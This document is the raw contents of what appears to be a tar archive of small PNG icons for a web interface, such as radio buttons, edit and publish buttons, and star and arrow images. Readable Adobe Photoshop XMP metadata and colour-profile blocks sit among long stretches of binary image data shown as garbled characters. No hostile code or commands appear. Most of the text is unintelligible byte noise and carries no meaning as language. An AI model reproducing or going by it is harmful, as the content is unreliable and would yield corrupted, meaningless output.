IHDRԯ,�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:53507BB937E611E3AD86D5EBF6E4BAB1" xmpMM:DocumentID="xmp.did:53507BBA37E611E3AD86D5EBF6E4BAB1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53507BB737E611E3AD86D5EBF6E4BAB1" stRef:documentID="xmp.did:53507BB837E611E3AD86D5EBF6E4BAB1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>fJh��IDATx�t�M(fa��}�C(&e�Y�a1�ѻ��PM��򖬦ll�}K�RV�$%E�3v�|���/���s��?�s���D"1�i��h4z,_	fV��~<��VB*D`�B�)�
�a~��Q
�Ih�K	�h�0\�>K�f�2a��`� ]��0�	�`~�
�Y6&pa��m��^X�|7�b��#_�����l���Ф�r=�1�P,Գ'_�^����j
tC��I�0c��iD/�xٰ�jc�S��4�o��?���	@-��w9��b[b�+Y�&�E�P��l&����xW�V��,�3�4�h��_�-�^NZ���4޾��6O�r��c���y�����_�4�9z�Of���nKS�S�b�
�U�2'��@��˲MK�C�
͆��u2�U�3���Q�|�1���IEND�B`�images/05/sbpic.png000060400000003766152434416630010063 0ustar00�PNG


IHDR%$��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:DF8AF5CE37DB11E3AC93D4081066E44E" xmpMM:DocumentID="xmp.did:DF8AF5CF37DB11E3AC93D4081066E44E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DF8AF5CC37DB11E3AC93D4081066E44E" stRef:documentID="xmp.did:DF8AF5CD37DB11E3AC93D4081066E44E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>	c�jIDATxڼ�]�Te����8�n~��G�fRX~�^h�zB,�A^�w�u�7��Hމ�z�7��`7���[j�V�l����n;���l��<#��gp</<������<������-^.�W��/+�J�{"�H�J�ӛ���^�c��a�����J�M���4��g�k@���P��<��"E�7���T�v�c6S�.:�s��Qkj�{�C�5��R��hr����}i��%=%��y�}lkF�P���5
^�d2��1�59ɲ����Ws��\��@"��N!������V*�ǘ���޴#��MP�c�-��1&Y	���f�iՁ�Y��eO,vh�]Ǣ���۶����[Ț�*/�}�o��,4 �E.
Um�|����{3��_�����V�f�K�c���U�#$-�j&̇���"j��À�(�$�y4"(�oz����B�T.BP����Xt�\��[�w��S���,�eA�!
c��x�c���;N�-��cP\�a������:��juRk#@�Kx�Ҿ�;y�crV�}d��o���<�N!��+}l�T���ܡ���Y���l��=N��Ez=�Jü�}Q�����Jy�J0^�������P�:��
�����RRy���,dz
PkU1jtGu�!��
L5'ػ�=?��y_�����R�!�r^�S����E
��.�b�Po�	9����[j}�-��umbq���:�f߆Y��G����Lc�h�:�s���#��@�N3=��^�׀<Ksw�ըS�Cl<������B�hUfݡK��3U��SC��&>�iKOʛ�x��خ�<��g�+��߬��	�Ki5���_�}�=��§AY5FKw�=k7a�H[��7��m^��9d�����Wՠ��]}�ۺz��.��!p�����辎1����!>l��Ո�z���������ڽ"��&hVPye�:f��]��I�`9!0����rm�-�
X�0�����:%�|�5+41��܇��q�g~p�j�ac����
���b=�kVJ@���[���*ڡ��BM�O�G����+
�o�߳���_�Rч��&�IEND�B`�images/left_hover.png000060400000003012152434416630010654 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:79A003078F7C11E58D7EA05D5EC58D84" xmpMM:InstanceID="xmp.iid:79A003068F7C11E58D7EA05D5EC58D84" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>:VIDATx�b���L@� �����#@1�����beJ2B@�@�)NR@�1�М}��F,B�����Q��,$��1��]�����
��󋙉�L����2��1�[��������"��߿i�w_$j�E8���\���ŒP��Ĵ���S����j$�8����@���W�C�a�3��/*�����9,*�ү����f����`��0�V���{�>FCC�����w�*~����ǟ���_x�h0����b/Kʾs����l�~����PlQ��}�9Y��q��H�r�2�FTr�B�Sd
(����0�210�l
PǏ���~��"����MZ�Ï_��‚���~��U��R?����c����������yؘ��Y!��)���bb�֐�篁$��P+L�=|3��=!6�p�3����WTyx��5����ȍ��ފr��)���H�Y���*`�������Vi���|��g^vVfvf ���O� q.�߿%�=������JB�"�������ͦ؏3 �IEND�B`�images/star_red.png000060400000001721152434416630010327 0ustar00�PNG


IHDRB �	pHYs�� cHRMz%������u0�`:�o�_�FWIDATxڬ��o�E��33���oߺK�/۲m�AJiiӃ1уc��1��C/�=x!��y����	�!�`"4(��lKwݾ�K�߯����P�e�u��̓g�C��/���#��h
�l3ċ
�i��\X�L�w��J��/0���n�A�T�=~U�
�t=��3��7V ]�^2J��L�~�W(���؀�X����k]*�1�l�x-�_��?-% P
g�����.Y!��
1Q�G&�s�س��J���J*��+ē�:8�����N�\I&�Z�{L��Dw@�;1�XE�ҕ�O�[[&U��c�*Z�uH�!��ÔH�\���ң��2U��r����I[N��f*5a���`~g`5���yi���x|�g��5ڶ�Ѿ�	e��?я����zT���CC��Л�Kx�E̘��Í���P�amIk׌���:��|�1 �AeֲYL���y��ʘ���i��~(������r�8ۦ�BG;��Ɗ��Ȅ�������zf?�LL�����2�־�$�>>�w=�~�h}��+cn�c��j6B���:Z_m�A����h8���5\�oy^�����K+��+��h
��Ӈ%��Qϋ1QgC�e\o?�h}ؑ����~�]�χ��a,��^�����O;����\߇0�]�g��|O���T�Vk�6�W(\�-#��#D|D�ݸ%:.��G�@4�n1����n;:�V��+��_"�_ދDw��ww�U.|�Ẍ�~���
;v�������f�;�{���BA��d_S��赴\_����|��q�����8�C6�1W��ڎ�vA;βQ*A�;��3��C�oIEND�B`�images/duplicate.png000060400000003223152434416630010475 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:68C0C17F8F7C11E5A01E9E2D489320D7" xmpMM:InstanceID="xmp.iid:68C0C17E8F7C11E5A01E9E2D489320D7" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�F���IDATx�bt[s���x��	?;�����O��#B�(�nb�g`��$*����_n�C���V�p��7'��*=t�a,@5�������!>�a�+���B����<��B��������@���(�� ��mdb���(n`A0?��}"����ߛ�>�v�/+�C�@��c��!�����%��ϋ�$���=gbdbcb��EO�|��s���3��"�	 �������5F\*�������?3#)c����ן�D���q����h�^)�`/@�x���t��ه�Y�k���/3X������;ȉ����/,��
�1C���b�)�v<x���/`$�����J�23~�&ZCNY�������5n6V3�X�+_��
�m>N�E,pG�!l����p�X���B�?��?��bG;3(4�3�'�p��;7+K�������?>��}��۵7�
����QS	|�������\3UWA��SU�[K��r�gb�b4��|����?F����󟟍-BC�TB��_P�deb������,}%��>��C�-��̈�h`�p�2���b4S@� 0\��G��������|��K�@��� 0�?��TT0�����`�W����T������矿�b�LL r�01�-����������0(����OJ��.���.'F�y�VIEND�B`�images/radio.png000060400000004564152434416630007632 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:EE1DFB31C7F511E4A8FDF67294466512" xmpMM:DocumentID="xmp.did:EE1DFB32C7F511E4A8FDF67294466512"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EE1DFB2FC7F511E4A8FDF67294466512" stRef:documentID="xmp.did:EE1DFB30C7F511E4A8FDF67294466512"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���IDATx��YiLTW�faXfP��"�tAM�[�F�K��QM�65�Ƹ��Kj
FQCФImm��]�֦&���	�X����RG��000�L�y<�O�E���˝w�=�}����n�B�Ub3	S	I�D��Nh$4��	%��{_?f�@H',"L'�{�b�:n1���u���O��|X/8��G�o����}K�Iz�ߏ
b��:o�MT�.�0� :��J��(o�)���H��=��G!�����Z]sp�n��я_Ȝ�G��
wZ�%Ct�s�XC����"D��?ƕ�oe�C���)�er;	�D!o���KApOD�(�2��OR;�/2q�YӗIC"�7i>b��`��@K�\�p��`?W����qMz��!X���9�u�]��ُ풙�`
�ss�1z�r�
=��y=�8�
�f���"E���k"�8���~����C���Ƽ�a�$��E�Ǽ��Ɨ(zR�j�j"��('/
v�	SW�5~����7
�M�j���)DSe��y��0Q��⸎�yKP�q<������w�%��(�R␚��&�����!q�rM���q0�Y؎��u�+-?s?��d8�o��mb�[�D�U5mt�����
'�MG���㹟�7�Ww;k�5-Cܫ���Et��R�3��Vy`<�������M���0Q��ٵ��L\H,C��<��ҳ�׎�yJ&��0_�Lg�Dj���!=w�m�<����
u�*���砰h!�����y���R��Q W+F!q�Uj-rl���&k�5ٯ�
�E���V�*�^:�yNJ��@s�ekp�f����\<,L��>7>&zIT��h�ގ��A�5e�^��r��{4~����w
mi����+��#�Į�d��3��P�?�mx=�hs�R�F��Q���K~�u��9*�l���|a���.��4gO�o�f��g�*�/����V��9�)z�	ѯ��V\�������	a+�Y��uܹvF�$�g=	����d۟^�A��|���Dz����4g��KB�y�g=�n�o�lh�=]�s�E�X��dC��8#�ΆeXL�Qho���oQ����ݱ^T<^ؗ��7[QA]�������&Q^�QA��ۈ$;�MqG�*���_���Ճ������.C�B���hL�2��!���f}OW��]��x����"ʱ���+��t�a�`�$+ߒs_��j�zIf	T.��=ƕ�W9�y�~�d�I$�_;ZC�ewb��3�8�4?mw�g�A%Y#{?ʅ�ֳ�`:��d������8�Y\O$J�e�8�}(9X�N�?�<�5X��gd��\���D��lZ'�ͪ�,LAF�s�&���>��g����"R���n�oDY��,+�o0&�#u�㨤dD,��
f��|���� rյ.�=v'K*R��s������=���� ��.x��S����	F_���iid'�IEND�B`�images/page_delete_all_hover.png000060400000046344152434416630013027 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�=CiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T19:57:57+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T19:57:57+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:87fd4ba7-8c73-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:d31096f8-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:e74d76ae-b0e4-4840-a1e7-eb6b5f25c0f9</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:749a5d63-8f9f-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:341bac5a-5a4f-a84f-bb92-476455889c97</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:341bac5a-5a4f-a84f-bb92-476455889c97</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:e74d76ae-b0e4-4840-a1e7-eb6b5f25c0f9</stEvt:instanceID>
                  <stEvt:when>2015-11-20T19:57:57+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>폈 cHRMz%������u0�`:�o�_�F�IDATx���SW��e�Y��!�UDPC�r$�j�q����>t����{Ǘ>�tZ�:ZQA���TD�"� $&��={�CR�0&�}�{�9���w������!��m����~2,���lS�\}a֎F?-{3�9t����8A}0d�Qe�냨Hr�G[�\���:r?aK���)(�限���E�	c�'|��u����lS��yǑ�ҩo��=(M��}��"+�l�c����z�N�	c6�s�D���V��U����}!ͬ����jʓa�^���ƒ�&���a��tf��jN���N:7�LMZ��MY�-�p4��9��:���gTzF̪J'ry�p�L���[��ِ�������TzW��oe���4�>;����	%��	�?�~	����J���ݝ,��]Bm3W�9&��D�Uu��h:�&��3�mR%�tV.��t�HJs��g3���u"��W�B��'#$�8�������-����{���f�lq9����8`̕T�~��3�1#������T1��t\}��9)of���ts��{\��D����x��:+�-,��2^�(�oY�p�:y���6��C�~!kR-Q,+:<h�$0:w�6:�K;b�LA1dX['ʝsq!�����:W��la)�W@�*R�i��aOr�kO���p��t��_�+K�Cc~��΋��X^ҟ"����V�&Gc���e¢��J�
yA��C�3_/*���u�5!^�g�Po�~?b8�4ْ
�h��߶N��dT��[<vbc���'�7./�8_��h��"�7|��"d�F,��j��Β
��I*#1����F	<_�`��}h����舣��i���i���t^֞�l�'����yҩo�����A���-:+�u�4W�"W�xs�<v�;O�#i�1��f����Tv����+���N��^��:d�h�ZrD��޾�=^��Ɩ�뽸���P��QekT��/?���	�]�nʛ��(w�!È
_p�{�����W2��\n����}��6�^�]W��S��F�iD��frX��5u�^�|
-l��&����֭Ft�G��ژ�[���go��ߚ��k�Ñ�s����Ӛ61B&Ǹ�G�1�N__4��+���'��mˊ��SG�Ս|e
dX+�,�u���ؼ���Mݦ���3����ba�}IEND�B`�images/edit_hover.png000060400000003336152434416630010660 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:553A6F148F7C11E5A4B59C81EAB661EC" xmpMM:InstanceID="xmp.iid:553A6F138F7C11E5A4B59C81EAB661EC" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�x*IDATx�b���L@����)N �"OӜ}�E��_ ����'�@�O?��*/���������BԤ_{䂄8X���v=|Q@�p�g%�(|��!�f����"��	5��B���)Ώ?�T��� ��.�����FF�㑍 ,6���JY��6��I���k��į��" �Y��!���������Ǘ�|D��$G�ĝg���������Ìg���@T���m6f�����p"@aw8��Chb`���/#.L�@�f�����	�UP��?�t���4���L�����5Rw���+BP���Y�-'o|���˯?�{/p�2CU������D����?~��6K�u�P_����j���Ï?���rR���9Ѐ~�MVZϾ|G������s��ٗ�cE������߅�������@�ubq�����3��,��2 Q��Z��?�����Ra��*����Ӕsw������D�-@�����Tg�l}�/�������b������-@��$ ��:�����{�s�������.FL��'o��U����,������i����/߳��gga�gc}��'�$�V�h:q�ʛO�,�Mp#PL�����߿�T�㶟�cg�gg}�W�����LL@��t�W1��okicqAQN6`�'���$���«��4�V�(n������$�=���PB`����o<`gã�vf���.�l�̬����d�����Ԕ�`O	r�!�':��B��m�IEND�B`�images/publish.png000060400000003533152434416630010175 0ustar00�PNG


IHDRR;^jtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B3683CC1406B11E29005D70CF0C92210" xmpMM:DocumentID="xmp.did:B3683CC2406B11E29005D70CF0C92210"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B3683CBF406B11E29005D70CF0C92210" stRef:documentID="xmp.did:B3683CC0406B11E29005D70CF0C92210"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��IDATx�<TMlE�fg��7�k;N�$v�8IK5��"5*��$ĉ��J�P"$�U\8�X�����EI�Z"����8N�8�����]�[)�y;���}�{�-���8.�6r���~�b.��{{�l>X,�^�%/C� ��$�d��ވ�]IǵP����h��,W��Kկ��W�u��˹�t��ݹy16;�Ʉ<���$\/�6��#C�=a*�lǚ��~��&Ea��;���l<�DH9	IL�q=nn`|�#�7t�/&���-UŻ�e����'d9��A	Ͷ�6k�m�n�j�잁�r�����f~eWZ3]�{�q7*I�h95k
�I ��34Z�Ǯ!�}
#=|���yc)v]苲����X%��ʈ���[
z���]�{��o��80�a5-Pr�.6)��?�x����������_�Lt��9=�lz"oU6pw�s��Ǔ��}*�>�y�$/�ұ�)x��h(��������p�@d>!X)���s���?�w��4�}2�+k�~�KPA� "?O�ϳ"�-�~�2@�����o�j��*���~Z�U�pF)��X�٬�����>�����q�z����ziC=g�^įo#�ơ*]�E"UP:XC�2�|F�r��i�=�c^��,�$F�
k[���*b�4��A#���
����q��*��>?��ڽ�^9�L)F�x&����~��0�,�n�(W7P1�������>=]!��}T|��W�ݺ��Ϗu'��&!S5(�6k��8ē�.L�۸:�э��gJq'd�P�nf�F���������V%��p�E��'��]�_��?�z,�JIӢO�뺢e��u��-+�Z��fX���^�a��q�DS"�@<SNw�6EU�Q��f��=�D"%�)�N|U�E�N;��y��?��C��4EI�eY�%Q4(��·�<���IEND�B`�images/08/01.png000060400000002133152434416630007171 0ustar00�PNG


